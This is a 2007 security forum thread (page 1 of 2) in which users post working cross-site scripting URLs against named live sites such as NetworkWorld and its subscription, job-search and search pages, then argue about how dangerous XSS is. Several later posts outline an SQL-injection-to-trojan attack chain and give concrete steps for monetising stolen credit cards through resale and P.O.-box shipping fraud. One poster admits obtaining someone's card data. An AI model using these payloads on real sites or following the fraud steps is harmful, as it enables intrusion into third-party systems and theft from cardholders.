Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
Network World
Posted by: id
Date: February 14, 2007 02:14PM

http://www.networkworld.com/community/?q=node/11501

Wonder if they are vulnerable to anything...

They should hold a contest, I'm sure team sla.ckers could win =p

-id

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 04:31PM

Not sure about vulnerabilities yet but I already submitted the function hbxStrip() in http://www.networkworld.com/community/themes/includes/head-minimum.js to thedailywtf.com.

Options: ReplyQuote
Re: Network World
Posted by: Mephisto
Date: February 14, 2007 04:34PM

So they're (Network World) not concerned with whether or not their website is secure, but they take offense to the "apocolyptic" tone of the press release.

If someone said that 70% of ANYTHING was bad, that IS apocolyptic!

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 04:35PM

Sure enough, this function is vulnerable - it doesn't strip quotation marks. The following works in Internet Explorer:

http://www.networkworld.com/community/?"/style="xss:expression(alert(1))

Options: ReplyQuote
Re: Network World
Posted by: WhiteAcid
Date: February 14, 2007 04:42PM

That function is just hilarious.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Network World
Posted by: Mephisto
Date: February 14, 2007 04:42PM

http://networkworld.4jobs.com/JS/Action/Searchresults.asp?q=y&key='--%3E%3Cscript%3Ealert(%22We%20are%20vulnerable%22);%3C/script%3E&SType=1&I1=23



Edited 2 time(s). Last edit at 02/14/2007 04:44PM by Mephisto.

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 05:15PM

Ouch... This hbxStrip() function isn't NetworkWorld's creation, it is WebSideStory code ( http://www.websidestory.com/products/web-analytics/hbx-analytics/overview.html ). That's much bigger than I thought, lots of sites should be vulnerable in the same way. At the very least this exploit works on InfoWorld.com. Anybody have a contact at WebSideStory?



Edited 2 time(s). Last edit at 02/14/2007 05:31PM by trev.

Options: ReplyQuote
Re: Network World
Posted by: SW
Date: February 14, 2007 05:50PM

That is a pretty neat function. Could be cooler though,

function s(str,i){
if(i==null) i=0;
if(i<str.length) str=s(str,++i);
return str.split("\n.\r.|.&.'.#.&.^.*.:.!.<.>.~.;. ".split('.')).join('');}



Edited 1 time(s). Last edit at 02/14/2007 05:51PM by SW.

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 05:54PM

Click "E-Mail article": http://www.networkworld.com/news/2007/021207-cisco-nokia-convergence.html?'+alert('XSS')+'

Options: ReplyQuote
Re: Network World
Posted by: SW
Date: February 14, 2007 06:03PM

trev Wrote:
-------------------------------------------------------
> Click "E-Mail article":
> http://www.networkworld.com/news/2007/021207-cisco
> -nokia-convergence.html?'+alert('XSS')+'


This doesn't seem to work in IE7 or FF2.0. :-\

Options: ReplyQuote
Re: Network World
Posted by: tx
Date: February 14, 2007 06:08PM

Didn't work for me either, fixed it up a bit:

http://www.networkworld.com/news/2007/021207-cisco-nokia-convergence.html?');alert('XSS');"><div%20name=" (click the E-mail Article link)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Network World
Posted by: Kyran
Date: February 14, 2007 06:15PM

I don't want a subscription...
http://www.subscribenw.com/nl/Signup.do?call=eclogin&txtOldEmail=%22%3E%3Cscript%3Ealert('$1000%20plx')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: Network World
Posted by: Kyran
Date: February 14, 2007 06:19PM

http://www.networkworld.com/resourcelibrary/?type=xss!%3Cscript%3Ealert('$1000%20plx')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 06:25PM

https://www.networkworld.com/reg/reg.do?call=lookup&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

@SW: That one works fine in Firefox and IE. You just shouldn't forget the single quotation mark at the end that this forum cuts off. Of course if you only want IE you can simply inject HTML and make the script execute immediately instead of waiting for the user to click the link: http://www.networkworld.com/news/2007/021207-cisco-nokia-convergence.html?"><script>alert("XSS")</script>

Options: ReplyQuote
Re: Network World
Posted by: Kyran
Date: February 14, 2007 06:31PM

http://www.networkworld.com/salary/2006/level.jsp?level=xss%22%3E%3Cscript%3Ealert('Point%20across%20yet?')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: Network World
Posted by: rsnake
Date: February 14, 2007 06:36PM

Haha... this one was worth the read:

http://www.matasano.com/log/700/joel-snyder-follows-up-matasano-provides-the-missing-subtext/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Network World
Posted by: xknown
Date: February 14, 2007 06:46PM

http://www.networkworld.com/mailto/mailform.jsp?pagetosend=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

Options: ReplyQuote
Re: Network World
Posted by: tx
Date: February 14, 2007 06:58PM

Click on any of Mr. Joel Snyder's wonderful articles

http://search.nwfusion.com/query.html?&col=archive1+1999&ht=0&qp=&qc=&pw=455&ws=0&la=en&si=0&fs=&op0=%2B&fl0=author%3A&ty0=p&tx0=Joel+Snyder&op1=%2B&fl1=&ty1=w&tx1=&op2=-&fl2=&ty2=w&tx2=&qt=&ex=&rq=0&oq=&dt=&inthe=63072000&qm=0&ql=&st=26&nh=25&lk=1&rf=1&qs=");alert('xss');//

Since the forum is gonna mess with that link:
h ttp://search.nwfusion.com/query.html?&col=archive1+1999&ht=0&qp=&qc=&pw=455&ws=0&la=en&si=0&fs=&op0=%2B&fl0=author%3A&ty0=p&tx0=Joel+Snyder&op1=%2B&fl1=&ty1=w&tx1=&op2=-&fl2=&ty2=w&tx2=&qt=&ex=&rq=0&oq=&dt=&inthe=63072000&qm=0&ql=&st=26&nh=25&lk=1&rf=1&qs=");alert('xss');//

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/14/2007 06:59PM by tx.

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 07:15PM

http://www.networkworld.com/askTheExpert.jsp?pagename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 14, 2007 07:58PM

NetworkWorld is getting boring, something different: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.opus1.com/htbin/faxpage&URL=http%3A%2F%2Ftest%2F%3C%22%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22%22%3E&FILE=disk%24ebony%3A%5Bhttpd.o%5Dabout_weather.html&FAX=1234567 [opus1.com]. And I didn't even try to play with the FILE parameter, I am pretty sure it would fax me the source code of all CGI scripts on this site...

Options: ReplyQuote
Re: Network World
Posted by: jungsonn
Date: February 15, 2007 09:36AM

Sorry to say but who actually cares if that sites has an XSS hole on it? Can you steal my creditcard data now? do you know my bank balance now? I pretty agree on most things discussed here on the forum about XSS, but it doesn't hit reality.

It poses no risk whatsoever, if anyone can give me an actual risk; please do. And along with that a method of making it cost effective.

I'm not busting balls here, I only try to keep it real.

Options: ReplyQuote
Re: Network World
Posted by: trev
Date: February 15, 2007 10:09AM

No, I can't steal your credit card data - but I can post comments with your name or take over your blog on NetworkWorld.com if you happen to have one.

Options: ReplyQuote
Re: Network World
Posted by: rsnake
Date: February 15, 2007 10:56AM

There are dozens of ways to steal credit card data. Yes, your credit card can be stolen through XSS holes (maybe not YOUR credit card number but some credit card numbers). Including the firefox auto-fill feature, the mhtml vuln (assuming your credit card is visible on any site anywhere that you're currently logged into), stealing files from your drive that might contain this sort of data - thanks to Michal Zalewsky, intranet hacking to break into the corporate network etc... etc... You are thinking way too one dimensionally, Jungsonn.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Network World
Posted by: jungsonn
Date: February 15, 2007 11:28AM

Yeah but where do you enter those creditcard numbers? mostly on a trusted third party server which process this stuff. Not the actual scanned webstore, Are those sites vulnerable then?

What i'm trying to do here is to hack minds, that isn't one dimensional, in fact it's standing outside the security box, looking around the threats, and analyse those threat claims.

And what if they steal 10 creditcard numbers?

1.they have to do that from a SSL line (kinda tough)
2.the next thing is to actually gain money from it. How are you going to do that?
3.They have a withdrawel threshold.
4.you have to actually buy stuff with it (easy to get caught)
5.creditcards have secure pins etc etc.
6.And is it profitable to steal 10 cardnumbers?
7. creditcard proccessors have spending analysis, giving alerts based on the spending patern (thats why hackers steal little amounts, from thousands of cards)

I think it is way more profitable to skim creditcards at your local restaurant, think you have to worry more about those guys who actually copy the card (you need physical access to it).

It's all theorectical, has anyone actually tried it out?

Options: ReplyQuote
Re: Network World
Posted by: jungsonn
Date: February 15, 2007 04:07PM

...and seriously I'm a little disapointed by all the websec guys that don't see this in it's full context. Surely Joel knows what the websec guys talk about; He just plays the advocate of the devil here, to make one think about the real big threats and not single customer/surfer attacks.

Here is my comment on slashdot:

I think I'm almost the only websec guy that agrees with Joel on this one. Hence, Iv'e been talking about it before; Acunetix claim is false on a practical level. It's only a theorectical one, and it must be considered as such. No man can state 70% is really vulnerable to a compromise, even if I saw all data. Then you have to figure out to make it profitable to actually do it, and get away with the crime. Ever wondered how citibank lost all those millions to some russians? not through XSS or SQL injection, but actually hacking into their network.

But hear my theory: "I think that 70% of all local banks are in risk of an inmediate heist!" Yeah, this could be in theory. Now I have to only do it. And that is the biggest problem.

Another one: "99% of all stores are vulnerable to a stickup!" Yeah for sure, but can I rob all stores? and how much can I rob before someone grabs me?

The things that have been summed up by the websec guys like:

*portscanning
*cookie stealing
*clipboard reading
*and whatever...

Well, sure this can be done. But is it profitable? is it doable on a large scale? do real hackers want to read your clipboard? C'mon, of coarse they do not. They want 150.000 creditcards. And to obtain those you need to hack into a server, in their network. You cannot do this with a little XSS. tell me the first person who did this with Cross Site Scripting? Anyone's server being taken done through it?

I guess not.

That is where threat analysis come into view, how much of those 70% of web sites pose a real threat? are all those 70% of sites online banks? then they are right. But my sheer guess is that no bank is listed on their scanlist.

Sorry but this time I do not agree with most websec guys in the real context of threat analysis of the sites they hav scanned.

Options: ReplyQuote
Re: Network World
Posted by: nEUrOO
Date: February 15, 2007 04:32PM

I think you say "vulnerable" for "directly exploitable vulnerability" which, for me at least may not be the case it's more general.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/15/2007 04:34PM by nEUrOO.

Options: ReplyQuote
Re: Network World
Posted by: tx
Date: February 15, 2007 04:58PM

@Jungsonn: The issue as I see it is more along the lines Rsnake's Death by 1000 cuts post http://ha.ckers.org/deathby1000cuts/. The fact of the matter is aside from things like passthrough() (in case php injection is a possibility) there are only limited things one can do with a xss vulnerability. But the information that can be gained can (portscanning, cookie theft, mitm, etc. etc.) be leveraged quite a bit. Likewise, directory listing while not a bug in and of itself can provide valueable information about a server, and can expose more areas for attack. Information that _can_ be used to compromise it. It's all about leveraging what you can get: things like using information gained by exploiting one site to attack another, Or the fact that people are lazy and tend to reuse passwords (it may not be best practice but people still do it, even administrators).

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Network World
Posted by: Mephisto
Date: February 15, 2007 09:03PM

1) A phishing email using a reflective XSS on a major site could be enough to con a victim into supplying all the information that would be needed. Not to mention any additional information your could gather if you incorporated the mhtml vulnerability.

2) Monetary gain can be made on underground IRC channels, buying and selling credit card info is booming on the black market. The higher the credit limit, the more money that can be made from selling it.

3) Generally credit cards only have PIN numbers when they are used for making cash withdraws from ATM machines.

4) 10 stolen credit cards with $5000 limits could still make you a couple thousand dollars if you can find a buyer.

5) Using stolen credit cards to purchase items online is relatively simple, assuming you have already stolen someones identity. Using the stolen identity you could get a P.O. box using the stolen identities name, then go to amazon.com, purchase a couple $1000's worth of merchandise have it overnight or 2 day shipped to the P.O. box. Once you have the merchandise you just walk away. It's another 20+ days before the purchase shows up on the victims billing statement, unless they actively monitor their accounts online.

There are any number of ways these things can happen. Let's not forget the world has evolved from hobbyist hackers breaking into networks because it's a challenge to the hackers of today who are driven by financial gain; they are organized and present a very real threat to everyone.



Edited 1 time(s). Last edit at 02/15/2007 10:20PM by Mephisto.

Options: ReplyQuote
Re: Network World
Posted by: digi7al64
Date: February 15, 2007 09:40PM

jungsonn Wrote:
-------------------------------------------------------
> Well, sure this can be done. But is it profitable?
> is it doable on a large scale? do real hackers
> want to read your clipboard? C'mon, of coarse they
> do not. They want 150.000 creditcards. And to
> obtain those you need to hack into a server, in
> their network. You cannot do this with a little
> XSS. tell me the first person who did this with
> Cross Site Scripting? Anyone's server being taken
> done through it?
>
> I guess not.


Consider this.
- Using SQL injection i login to the intranet of the site Iam targetting (can only inject to gain access, no other privileges to be found).
- After viewing all the data there i find no real information.
- But i can inject persistant xss into the news via the admin panel, so i do that.
- The xss injected is designed to create a batch file in the start up folder which in turns downloads an app to pc on start up.
- When the computer restarts, it downloads my trojan.

Next
- User logs into intranet and IE warning bar displays.
- User clicks ok to run activex control becuase it is on the the intranet and therefore should be ok.
- Furthermore, I also added some rich content to the screen to make it look legit.
- Batch file is created
- User logs out, turns off computer etc
- User turns on computers
- trojan is downloaded.
- user owned.
- password owned.

... and not only that i have my trojan within the network. All with some simple SQL and XSS.


EDIT: (@jungsonn) - Just read your blog regarding this subject. And yes whilst you do make some valid points, remember xss is more then just an 'pwnt!' alert. What is does is verify (to a certain extent) that user input into the site is essentially unfiltered... and with that said, how many servers have been owned becuase we could find remote file include vulnerabilities?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 02/16/2007 12:52AM by digi7al64.

Options: ReplyQuote
Re: Network World
Posted by: jungsonn
Date: February 16, 2007 07:19AM

I agree with you guys on this one, most things layout in above post still stand. Of course it's relativly simple to do this stuff on let's say a couple of surfers? A persistent hacker can surely take things down, but to put it into perspective these things don't happen that much like I want to believe. Certainly not when some company says that 70% of them are in an "inmediate risk" which is just bullocks. Like I said in my article everyone has an ftp and mail port, these are vulnerable too (in theory) now how many times are those exploited, not many.

The thing is, the sites they scanned may contain some webshops. But any reasonable webshop doesn't store creditcard data, and does not process it. If they do, they should be banned from the net. You let things like that handle by third parties. And they have appropiate measures to secure things like that.

And to be really, really honest, I have tried it before. About 2 years ago. Really, no kidding here: try to find someone's creditcard info (all of it) exp.date, pins, the whole range. It's hard.

for personal knowledge I managed to get hold of someone's creditcard information, but I detroyed it after that. I only wanted to know how easy it could be (from a researchers standpoint, which include sometimes actuall hacking). And FYI it took me about 1 month to launch such thing with a webattack/social engineering point only.

So, it is far more profitable to actually hack into a network of some creditcard processor, and download the whole database.

I don't want to kick nuts here, I'm only trying to put the risks into real perspective. I know it won't give me a good name while i'm at it, but I think it can be another angle to be honest on this one.

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.